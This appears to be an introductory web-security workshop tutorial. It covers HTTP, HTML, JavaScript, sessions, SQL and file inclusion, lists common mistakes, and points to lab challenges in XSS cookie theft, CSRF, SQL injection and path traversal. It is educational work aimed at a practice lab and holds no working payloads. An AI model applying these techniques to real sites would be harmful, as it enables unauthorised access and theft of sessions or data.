Web techniques

Web applications often have three parts:

Web server

A web server serves documents to web browsers via HTTP, which is a network protocol.

A protocol is an agreed upon way of talking between computers.

HTTP

HTTP uses URLs to find web pages. These are what you see in the address bar near the top of a web browser.

https://hackintheclass.nl/index.php?show=Workshops&page=1 Protocol Host name or server address (HTTP_HOST) Path to the document (SCRIPT_NAME) Variable Value of 'show' variable Variable Value Query (QUERY_STRING) Request (REQUEST_URI)

Path to the document

For a path of /admin/news/index.php, it looks in the file system tree:
First it finds admin in / (the root), then it finds news in admin/, then it finds index.php in news. /

What happens when..

Visiting web page https://bitlair.nl/Workshops:

HTTP GET request

GET forms put data in the URL, visible in the address bar and stored in the browser history and can be bookmarked.
GET /logon.php?username=hax0r&password=supersecret123 HTTP/1.1
Host: bitlair.nl
Cookie: PHPSESSID=f1a1d9715b3491bbc2d5203c88ac67fb
Referer: https://bitlair.nl/index.php?action=showloginform
User-Agent: Mozilla/5.0 >--snip--< Chrome/69.0.4453.96

>-- end of request --<
            
Address bar with GET request
It helps to use the developer tools (press F12) - network tab to look at the network traffic.

HTTP POST request

POST forms put data in the request content, not visible anywhere else.
POST /logon.php HTTP/1.1
Host: bitlair.nl
Cookie: PHPSESSID=f1a1d9715b3491bbc2d5203c88ac67fb
Referer: https://bitlair.nl/index.php?action=showloginform
User-Agent: Mozilla/5.0 >--snip--< Chrome/69.0.4453.96
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

username=hax0r&password=supersecret123
>-- end of request --<
            
It helps to use the developer tools (press F12) - network tab to look at the network traffic.

More information about HTTP

If you want to know more about web servers and the HTTP protocol, go to

HTTP: common mistakes

Mistake: Not using encryption
Websites should always use HTTPS (HTTP Secured). When they don't use encryption:
Mistake: Information disclosure

Play HTTP challenges

They get more difficult as you reach higher levels, look for version numbers, indexes, backup files, subversion work trees and git work trees. If you get stuck, no problem, just continue the tutorial and come back here later.

HTML

All of the layout and content of every web page is controlled through HTML

Go to a random web page, right click on a background area, then click on "View page source".
View source right mouse click
Also available by pressing and holding Ctrl then pressing U (Ctrl-U)

Basic HTML

HyperText Markup Language: markup with tags: <open tag>content</close tag>
    <!doctype html>
    <html>
    <head>
      <title>Example HTML website</title>
    </head>
    <body>
      <h1>Top level header</h1>
      <ul>
        <li><a href="http://www.google.nl">Google</a></li>
        <li><a href="https://bitlair.nl>Bitlair</a></li>
      </ul>
    </body>
    </html>
HTML tutorial at w3schools

HTML Forms

    <form method="POST">
      <table>
        <tr>
          <td>Username:</td>
          <td><input type="text" name="username"></td>
        </tr>
        <tr>
          <td>Password:</td>
          <td><input type="password" name="password"></td>
        </tr>
      </table>
      <input type="submit" value="Log me in">
    </form>
            
Try changing the method from POST to GET on the Play around with HTML forms slide, then submit and see what happens
HTML forms tutorial at w3schools

More information about HTML

If you want to know more about HTML, go to

Play around with HTML forms

HTML code - Change me
HTTP information

HTML: Common mistakes

Mistake: Information leaking
Mistake: not encoding user content

Play HTML challenges

Include an image in a website in challenge:

Javascript

Javascript is a programming language that runs in the web browser

Javascript: example

This script finds the username HTML input and makes it available in the variable usernameInput.
It then checks if what the user typed is the same in the username field as in the password field
    <input type="text" id="username">
    <script type="text/javascript">
        // Finds the username HTML input field above and puts it in variable usernameInput
        var usernameInput = document.getElementById("username");

        // Compare what the user entered in username to the password input.
        if (usernameInput.value == passwordInput.value) {
            // Username and password are the same.
            ...
        }
    </script>
            

More information about Javascript.

If you want to know more about Javascript, go to

Javascript: Common mistakes

Because Javascript runs on the client, clients can bypass or manipulate it. As a result, these mistakes are common:
Mistake: Not checking input
Javascript runs on the client. Validating user input like form fields in javascript is not enough to protect the server. All input always has to be checked on the server.
Mistake: Checking the password in JS
Javascript runs on the client. Any check can be bypassed or inspected. This includes password checks, but also permission checks (authentication and authorisation).
Mistake: Not encoding input, allowing JS
This is actually an HTML mistake: Not encoding user content
Mistake: Including JS from other sites
Including javascript from a server managed by somebody else (like googleapis.com, jquery.org, github.io) is not good practice.
Mistake: Not restricting JS in frames
Using frames with external content (like advertisements) without preventing access to information on the page (sandboxing) opens the website up to hijacking.

Play Javascript challenges

Inject javascript into a website.

Play Basic Web challenges

You can now do challenges:

Web application

Javascript can run program code in the web browser. But the web server can also run program code. Other programming languages can be run on the server server as well, like Python, Java, ASP.NET and even Javascript.

Sessions

Session mistakes

Mistake: Predictable session ID
If the session cookie for user ID 1 is always something like sha1(user1), or md5(1) or sessions are handed out like sessionid=10, sessionid=11, it is considered predictable.

Play session challenges

Get the admin cookie with Cross Site Scripting, log in with the admin cookie:

PHP

PHP is a programming language for building up HTML web pages. Other programming languages can be run on the server server as well, like Python, Java, ASP.NET and even Javascript.

Web application: Common mistakes

Mistake: Having default passwords

A lot of applications and devices come with default passwords. This is not smart. It is better to require the user to set a password on first use.

Mistake: Allowing weak / leaked passwords

Mistake: Not limiting login attempts

Our lab will not have brute force challenges, but will have challenges that involve the most common default usernames/passwords

Mistake: Trusting the browser with secrets

Some web applications don't use sessions, but store the username and password in the cookies

Mistake: Predictable interactions

Mistake: Not updating components

Mistake: poor permission checks

Play web application challenges

Try to make the guest user become admin, using Cross Site Request Forgery.

Data

Data is stored:

Database

A data store that servers data to other applications. There are many types, but the most common are:

Data retrieval

Most web applications use SQL databases for data storage

SQL comments - MySQL

            SELECT password     # Password field
            FROM users          # Users table
            WHERE id=1 OR id=2  # User ID 1 or 2
            ORDER BY id ASC     # Sort by id, ascending
            LIMIT 2             # Show only two records
            ;                   # End of query            

SQL data is stored in tables

Table "users":

userid username password email
1 synnack Supersecret123! synnack@example.com
2 admin Adm1ns3cr3t! admin@example.com


* Note: It is bad to store plaintext passwords, use a password-based key derivation function like PBKDF2 or bcrypt.

Play around with SQL

SQL: Common mistakes

SQL databases have several potential vulnerabilities
Enumeration
If data is accessed like /page.php?id=1, can we also get page 2, 3, 4 and 5?

id page
1 AMERSFOORT Today we witnessed a...
2 AMSTERDAM It was an historic even...
3 Unpublished - Top secret files leaked...

SQL injection
Try SQL injection
Common patterns (do try at Play around with SQL): Study the Pentestmonkey cheatsheet for inspiration on what to type behind UNION SELECT, like finding table names and field names in a certain table.

Play SQL injection challenges 1 and 2
Open the Pentestmonkey cheatsheet and The play around slide in new tabs, then open the levels in a new tab.
Play SQL injection challenges 3
For this level you will need to know about HTTP requests as well, see the web server section

File system

Files are sometimes included from the file system. Typically, this looks like as ?page=home.html or as download.php?file=pentest-report.pdf in the URL bar

File system inclusion: Common mistakes

Path Traversal
download.php?file=pentest-report.pdf
Play path traversal challenges 1 and 2
Play path traversal challenges 3

Play combining skills challenges

Hack in the Class

Web technologies

Click here to start.